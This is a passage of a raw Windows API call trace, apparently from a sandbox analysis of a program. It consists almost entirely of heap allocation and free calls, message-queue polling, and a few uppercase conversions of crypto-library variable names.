[0198.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0198.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0198.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0198.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0198.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0198.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0198.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0198.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0198.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0198.183] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0198.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0198.183] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0198.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0198.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0198.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0198.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0198.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0198.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0198.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0198.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0198.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0198.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0198.184] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0198.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0198.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0198.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0198.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0198.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0198.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0198.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0198.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0198.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0198.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0198.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0198.184] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0198.184] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0198.184] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0198.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0198.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0198.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0198.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0198.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0198.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0198.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0198.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0198.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0198.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0198.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0198.185] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0198.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0198.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0198.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0198.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0198.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0198.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0198.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0198.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0198.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0198.185] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0198.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0198.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0198.185] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0198.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0198.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0198.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0198.186] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0198.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0198.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0198.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0198.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0198.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0198.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0198.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0198.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0198.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0198.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0198.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0198.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0198.186] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0198.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0198.186] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0198.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0198.186] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0198.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50908 [0198.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0198.186] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0198.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0198.186] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0198.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0198.187] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0198.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0198.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0198.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50878 [0198.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0198.187] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0198.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0198.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0198.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0198.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0198.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0198.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0198.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0198.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0198.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0198.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0198.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0198.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0198.187] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0198.187] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0198.187] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0198.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdf8 [0198.187] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0198.187] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0198.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdf8 | out: hHeap=0x970000) returned 1 [0198.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0198.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50878 [0198.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0198.188] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0198.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0198.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0198.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0198.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0198.188] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0198.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0198.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0198.188] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0198.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0198.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0198.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0198.188] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0198.188] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0198.188] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0198.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0198.188] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0198.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0198.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0198.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0198.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0198.189] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0198.189] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0198.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0198.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0198.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0198.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0198.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0198.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0198.189] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0198.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0198.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0198.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506e0 [0198.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0198.189] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0198.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0198.189] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0198.189] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0198.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0198.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0198.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0198.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0198.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0198.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0198.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0198.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0198.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0198.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0198.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0198.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0198.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0198.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0198.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0198.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0198.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0198.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0198.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0198.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0198.190] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0198.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0198.190] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0198.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0198.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0198.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0198.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0198.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0198.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0198.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0198.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0198.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0198.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0198.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54288 | out: hHeap=0x970000) returned 1 [0198.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0198.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0198.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0198.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0198.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0198.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0198.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0198.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0198.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0198.191] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0198.191] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0198.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0198.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0198.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0198.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0198.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0198.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0198.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0198.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0198.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0198.192] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0198.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0198.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0198.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0198.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0198.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f08 [0198.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0198.192] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x1180020 [0198.212] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0198.213] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x1180020 | out: hHeap=0x970000) returned 1 [0198.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0198.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0198.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0198.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0198.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0198.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0198.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0198.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0198.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e56430 [0198.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0198.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0198.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0198.219] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0198.219] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0198.219] RtlAllocateHeap 